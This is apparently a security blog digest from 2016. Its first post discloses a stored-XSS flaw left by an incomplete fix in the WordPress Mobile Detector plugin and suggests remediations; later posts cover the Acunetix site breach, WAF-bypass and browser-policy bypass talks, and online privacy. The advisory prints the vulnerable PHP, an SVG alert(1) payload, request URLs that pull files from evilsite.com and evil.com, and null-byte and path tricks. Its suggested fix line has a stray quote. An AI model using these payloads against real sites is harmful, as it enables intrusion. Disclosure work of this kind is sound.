ad

Hacking and Cracking

Hacking and Cracking


Wordpress Mobile Detector Incorrect Fix Leads To Stored XSS

Posted: 13 Jun 2016 03:30 AM PDT


Recently, Wordpress Mobile Detector plugin was in news for the "Remote Code Execution" vulnerability that was found inside the resize.php file. The vulnerability allowed an external attacker to upload arbitrary files to the server as there was no validation being performed for the file-type that has to be retrieved from an external source.

Soon after the vulnerability became public, the plugin was taken down from wordpress directory until the issue was fixed. However, as per my analysis the fix is incomplete and leads to stored XSS. 

The Vulnerability

Let's discuss about the initial vulnerability first. The following PHP code takes input via src parameter (GET or POST) and checks for the existence of the file. If it exists, appropriate content-type header is set. 

Code

<?php
if (isset($_REQUEST['src'])) { $path = dirname(__FILE__) . "/cache/" . basename($_REQUEST['src']);
if(file_exists($path)){
.
.
.
.
file_put_contents($path, file_get_contents($_REQUEST['src']));

?>

It then utilizes the file_get_contents function in order to fetch file contents from a URL and upload it to the webhost under cache directory.  Please note that, this is only possible if allow_url_fopen is enable upon the server which limits the effectiveness and impact of the exploit.  The problem with the above code is that the code does not perform any check for extensions that are allowed.  So, in case if an can fetch/execute PHP, ASPX code it results in a code execution.

The (incomplete) Fix

The following fix was implemented which defined a whitelist of all extensions that are acceptable (primarily images). The code checks if the requested file ends with the whitelisted extensions before they are fetched and uploaded. 

<?php
.
.
.
.
.
$acceptable_extensions = ['png','gif','jpg','jpeg','jif','jfif','svg'];
$info = pathinfo($_REQUEST['src']);
// Check file extension
if(in_array($info['extension'],$acceptable_extensions)){
file_put_contents($path, file_get_contents($_REQUEST['src']));

?>

The problem with the above fix is that it whitelists "svg" extension. It is a widely known fact that svg images can execute JavaScript. 

Using SVG To Trigger Stored XSS

In order to demonstrate the finding, The following svg file would be hosted on a Remote Server. 

test.svg

<?xml version="1.0" standalone="no"?><!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"><svg onload="alert(1)" xmlns="http://www.w3.org/2000/svg"><defs><font id="x"><font-face font-family="y"/></font></defs></svg>

This image once requested via "src" parameter will be saved to cache directory:

http://www.example.com/wp-content/plugins/wp-mobile-detector/resize.php?src=evilsite.com/test.svg

Upon visiting the uploaded image: 

http://www.example.com/wp-content/plugins/wp-mobile-detector/cache/test.svg


Other Attack Possibilities

i) In case where path finishes with an allowed extensions there is an attack possibility - victim.com/test.php/test.jpg.

ii) In older version of PHP, it is possible to append a nullbyte and tricking the server into uploading a malicious PHP file. Example - http://evil.com/malicious.php.svg

iii) In case if Display_errors is set to true in php.ini file. The file_get_contents() function can be utilized for . A similar issue was discovered by me in the year 2013. You can refer to the following blog post -  phpThumb Server Side Request Forgery

iv) In case where path finishes with an allowed extensions there is an attack possibility - victim.com/test.php/test.jpg. 

v) Even allowing external users to fetch and upload images can external images might introduce issues such as someone can host porn images and tarnish companies reputation, someone can deliberately upload a copyrighted image and sue the company, since there is no limit to the number of images one can upload, one can still attempt to exhaust server resources by uploading tons of images. 

Suggested Fix For Vendor 

i) The suggested fix is removing the "svg" extension from whitelist

$acceptable_extensions = ['png','gif','jpg','jpeg','jif','jfif''];

ii) File names should be re-written after they are uploaded, so that their location may not be guessed. along with directory listing should also be disabled. 

Suggested Fix For Webmasters

iii) Server administrators should modify the .htaccess file to only support allowed extensions. and prevent accessing other files.

iv) Content-Type-Options: nosniff header to prevent exploiting the site using SWF file with .jpg extension for example - https://github.com/nccgroup/CrossSiteContentHijacking.

v) Content-Disposition header should be utilized.

Thanks for Soroush Dallili from NCC group and Daniel Sid from Sucuri for tipping off. 

Hacking and Cracking

Hacking and Cracking


Acunetix Website Hack And Lessons Learnt

Posted: 05 Jun 2016 01:57 AM PDT

Last night, Website of Acunetix(A Wellknown Automated Web Application Scanner) was hacked by Croatian hackers. From that point of this onward the website has been taken offline and acunetix team are reviewing the root cause for the hack. Currently the homepage is displaying a "403 Forbidden error", it might be due to the fact that either the attacker has deleted all he files or developers have deliberately taken it down in order to review the files for any possible backdoor that might had been injected.

Courtesy - http://exploitgate.com/acunetixs-website-got-hacked-croatian-hackers/

Lessons Learnt 

Up till now the cause of the hack remains unknown as Acunetix is yet to acknowledge it. However, The hack gives us the following important generic lessons:

i) Defense is more difficult than offense. For defense you have to find and close 100 doors which an attacker can use to get into the Server, For offense the attacker has to find one single way to get in.

ii) WebApplications now days have became extremely complex with new features being added on daily basis. It's almost impossible to achieve complexity and Security at the same time.

iii) Automated Scanners and Web Application Firewalls won't necessarily protect your Webapplications. As both of them do not understand Business Logic of the Application. Defense in depth principle should be followed where Security should be ensured at all layers. You can refer my article  "Secure Application Development And Modern Defenses"

iv) Security is not a one time job, it's an ongoing process, no specific requirement has to be met for 100% security.

One of the arguments that People would use is "How can their Tool ensure our Webapplication's Security, when they cannot protect themselves from getting hacked?", the answer is absolutely nothing can ensure 100% security,We have seem many Security products failing to ensure their own security, one of the examples can be found here (Imperva SecureSphere Web Application Firewall MX 9.5.6 - Blind SQL Injection), here ( So Who Hacked EC-Council Three Times This Week?) and here (Tavis Ormandy finds vulnerabilities in Sophos Anti-Virus products) and it's perfectly normal.

The problem comes when these product owner instead of acknowledging and responding to the breach wishes to remain silent and thereby loosing it's credibility even further in the eyes of customers and well as infosec community.  It is the right of  the customers to know whether their data was compromised in the breach and if yes up to what extent and if passwords were compromised, how were they storing the passwords.

With that being said, i would like to highlight the fact that they will not necessarily go out of the business after this hack. Eccouncil has been hacked multiple times and they are still in the business. 

Hacking and Cracking

Hacking and Cracking


Bypassing Modern WAF's Exemplified At XSS (Webcast)

Posted: 03 May 2016 02:41 PM PDT



Past Saturday, I conducted a "Webcast" on "Garage4hackers" on one of my favorite subjects in the field of Information Security i.e. "WAF Bypass". Initially, i had decided to present something on the topic of "Mobile Browser Security" due to the fact that this has been a topic I have been recently conducting a research on.

However i later realized that the "TakeAways" would not be much helpful, therefore i decided to talk about something that Bughunters/Pentesters can use in their day to day pentests and security engagements and hence i decided to present on this topic.

I must admit that the response has been overwhelming along with it, i have also managed to get a chance to learn more from the feedback and CTF responses.

I would like to specially thank "ImdadUllah", "Himanshu", "Sandeep"  along with other garage4hackers members for inviting/supporting me through out the journey.  One of the best things "G4H Community" is the work they are doing for the security community by conducting free of cost Webcasts. You can find a list of other Webcasts here - "http://www.garage4hackers.com/ranchoddas/"

Abstract

It is known that over the years, a trend that addresses the information security landscape has emerged, I mean, web applications are under attack, given this perspective, Web Application Firewalls are becoming increasingly popular, which are most commonly used by organizations to protect against various attacks such as SQL Injection, XSS etc.

While WAF's may help preventing application layer attacks up to some extent, however they certainly are not replacements for input validation and secure coding practices due to the fact that they are based upon Blacklists which means rejection of known patterns while allowing everything else. The problem, especially in case of JavaScript is that it's simply not possible to create blacklists capable of blocking all patterns without having to generate false positives due to the dynamic nature of javaScript and infinite ways of obfuscating the payload.

In this webinar, the we will talk about various techniques that can be used to bypass WAF"s such as Brute Forcing, Regular expression reversing and browser bugs. The webinar would mostly discuss

Prerequisite

- Basic knowledge about HTML/JavaScript

- Basic know how about XSS attacks

Webcast 


 

CTF Competition

After the webinar, we had this "CTF" challenge made up by a friend of mine "FileDescriptor", certain parts the first two challenges are based upon characteristics of a real world WAF that I encountered in wild which was combined with FD's ideas to make up the challenge . The last challenge is based upon "@FileDescriptor" unqiue idea and hence, it's not easy to crack and hence we named it as "Hard".

CTF Link :http://92.222.71.224

Hacking and Cracking

Hacking and Cracking


Bypassing Browser Security Policies for Fun and Profit (Full Presentation Video)

Posted: 21 Apr 2016 11:02 AM PDT


Blackhat has just recently released the full video for my talk on the subject of "Browser Security", If you wish to read the Whitepaper/Slides and SOP Test Suite, you can refer to my previous post on "Bypassing Browser Security Policies For Fun And Profit"


Abstract

Mobile browsers in comparison to desktop browsers are relatively new and have not gone under same level of scrutiny. Browser vendors have introduced and implemented tons of protection mechanisms against memory corruption exploits, which makes it very difficult to write a reliable exploit that would work under all circumstances. This leaves us with the "other" category of Client Side attacks. In this presentation, we will present our research about bypassing core security policies implemented inside browsers such as the "Same Origin Policy," and "Content Security Policy," etc. 

We will present several bypasses that were found in various mobile browsers during our research. In addition, we will also uncover other interesting security flaws found during our research such as Address Bar Spoofing, Content Spoofing, Cross Origin CSS Attacks, Charset Inheritance, CSP Bypass, Mixed Content Bypass, etc., as found in Android Browsers. We will also talk about the testing methodology that we used to uncover several android zero days. Apart from the theory, our presentation will also disclose a dozen of the most interesting examples of security vulnerabilities and weaknesses highlighted above, which we identified in the most popular Android third-party web browsers, and in Android WebView itself.

 We will explain the root cause of the bug and demonstrate their exploitation, show examples of vulnerable code and, where possible, patches that were issued to address these vulnerabilities. Finally, we will demonstrate a sample test suite which can be used to assess basic security properties of any mobile web/browser.

Hacking and Cracking

Hacking and Cracking


How Much Do Hackers Know About You?

Posted: 13 Apr 2016 07:07 AM PDT


The threat of black hat hackers has never been greater than now, considering the increasing organization of their efforts to make a dollar off of your digital assets and information. The common portrayal of the hacker is someone who knows enough about programming and the internet that they can seemingly access any information or know anything about anyone.

This is mostly an exaggeration. Finding information on someone is still work, sometimes very time-consuming and usually not worth the effort from a financial standpoint unless done on a large scale. It does beg the question, however, of how much hackers might know about you. Based on the trails you leave online and who you trust your information with, a hacker might already have a file with your name on it. It is a question worth investigating.


The answer is different for every person. Here are some factors you need to take into consideration:

Public Network Usage

How often do you use dangerous public networks to conduct online transactions or communicate with others? If you use them at all without protection, you leave yourself open to data interception. Hackers will often hang out in cafes or other public places with WiFi and use a "sniffing" device to take in the traffic of anyone unfortunate enough to be sending and receiving data over the network. Think back to what you've sent over a public network. Anything you sent or received could very well be in the hands of a hacker.

The best way to protect yourself on a public network (other than not using it) is to equip your device with a strong Virtual Private Network (VPN). A VPN will connect your device to an offsite secure server via an encrypted connection, allowing you to keep your information a secret from anyone hoping to look on. As an added benefit, your IP address will be masked by that of the offsite server, so you will be able to avoid tracking in that manner as well.

Large Scale Data Breaches

Do you know if your information has been leaked in a large scale data breach such as the Office of Personnel Management attack or the Target credit card scandal? If so, you might not have been immediately targeted for an attack, but it doesn't mean that the information has vanished from the internet. For the right price, that data (or large sets of data containing your information at a wholesale price) could be sent to an interested party. Some might not apply anymore, but with the right information, you could be traced.

To prevent this sort of thing in the future, the most you can do is choose the right organizations to trust your information to. Try to lobby for stronger standards of cybersecurity with the businesses you use and the government. You can't control organizations, but you can control who you trust.

Has One Account Been Compromised?

Much like dominoes, the breach of even one of your accounts can lead to a loss of other accounts linked to it or sharing data. Try to imagine what would happen if someone else had access to your email account. They would likely need only an hour to completely ruin your online life, should they want to. One social media account breach could easily lead a hacker to copy all of your conversations and scan them for private information. They might not even read it until the time is right to scam or blackmail you.

Think back and ask yourself if even the most minor of your accounts has been compromised. If so, ask yourself how long ago the incident took place. Look more into the data you could have lost at that time and whether it still is relevant today (some will be). Remember that in addition to financial information, the names of friends and family members could be linked with your accounts.

What Do You Keep on Your Computer?

Much of what black hat hackers do involves malware and using it to gain information on you. While some malware acts more like ransomware or a portal to let other malware in, other malware (or the same malware as a secondary measure) collects whatever information it can from you and sends the data on to its creator or owner.

If you've ever been the victim of malware, a lot of what you keep on your computer could be known by a hacker. Make sure that you try to avoid shady websites and use the best tools you can such as a high quality security suite to keep malicious programs off of your precious devices.

Privacy and Social Media Presence

Even if you keep your social media accounts safe, a hacker could use them to find out important information about you. Privacy is important to fend off malevolent hackers in a world of sharing.

Consider the following:

  • If you tag your location in a public post often enough, they might be able to get a general idea of your routine.
  • If you don't make your accounts as private as possible, a clever hacker might be able to use your public communications with your friends against you and deduce some of your movements and activities.
  • Even things such as the time of day you post can say a lot about you. A skilled hacker can use even the most basic information such as this to help build a plan to scam you better.
  • Doing a quick Google search of yourself online is a great way to determine how private you are online. If you can find it out through Google, have no doubt a hacker can find out the same information.

This is clearly a difficult question to answer for certain, but hopefully by this point you have a better idea of what to look out for and what a hacker could know about your personal life and what information they could have. You aren't defenseless, but further vigilance regarding all of your online activities is required.

Do you think there are any other factors to consider when trying to figure out how much a hacker could potentially know about you? Are there any other tools and methods of protections you would recommend? Please leave a comment below with your thoughts on the matter to continue this conversation.

About The Author

Cassie is a cyber security enthusiast who writes for "SecureThoughts" who understands that hackers will do anything they can to get information on anyone they can. The more you know, the better you can protect yourself, and ultimately that is her goal, to help others learn how to best protect themselves. 

Hacking and Cracking

Hacking and Cracking


Bypassing Browser Security Policies For Fun And Profit (Blackhat Asia 2016)

Posted: 31 Mar 2016 11:52 AM PDT



Few hours back, i delivered a talk at Blackhat Asia 2016  on "Bypassing Browser Security Policies For Fun And Profit", the talk covered wide variety of topics starting from SOP bypasses, CSP bypass so on and so forth. Due to limited time i was only able to cover few topics, however, you can find rest of the topics in the WhitePaper below. The following was the abstract:


Abstract


'Mobile browsers in comparison to desktop browsers are relatively new and have not gone under same level of scrutiny. Browser vendors have introduced and implemented tons of protection mechanisms against memory corruption exploits, which makes it very difficult to write a reliable exploit that would work under all circumstances. This leaves us with the "other" category of Client Side attacks. In this presentation, we will present our research about bypassing core security policies implemented inside browsers such as the "Same Origin Policy," and "Content Security Policy," etc. 

We will present several bypasses that were found in various mobile browsers during our research. In addition, we will also uncover other interesting security flaws found during our research such as Address Bar Spoofing, Content Spoofing, Cross Origin CSS Attacks, Charset Inheritance, CSP Bypass, Mixed Content Bypass, etc., as found in Android Browsers. We will also talk about the testing methodology that we used to uncover several android zero days.

Apart from the theory, our presentation will also disclose a dozen of the most interesting examples of security vulnerabilities and weaknesses highlighted above, which we identified in the most popular Android third-party web browsers, and in Android WebView itself. 

We will explain the root cause of the bug and demonstrate their exploitation, show examples of vulnerable code and, where possible, patches that were issued to address these vulnerabilities. Finally, we will demonstrate a sample test suite which can be used to assess basic security properties of any mobile web/browser'


WhitePaper


  


To download the Whitepaper, please click here.

Slides


To download the Whitepaper, please click here.

SOP Bypass Mini Test Suite v 1.0 Beta


As promised in my talk, i will make the test suite available on my blog, This test suite contains over 40 different test cases that have proven to work with different mobile browsers in my research or testing Same Origin Policy bypass issues with browsers. Due credits were given to the researchers whose Proof of concepts have been incorporated in this test suite. Please note that, this is just the beta version, the next version would have more test cases and we will try to automate the execution and results of all the test cases.

To download the SOP Bypass Mini Test Suite, please click here.

Shall you have any questions, feel free to ask.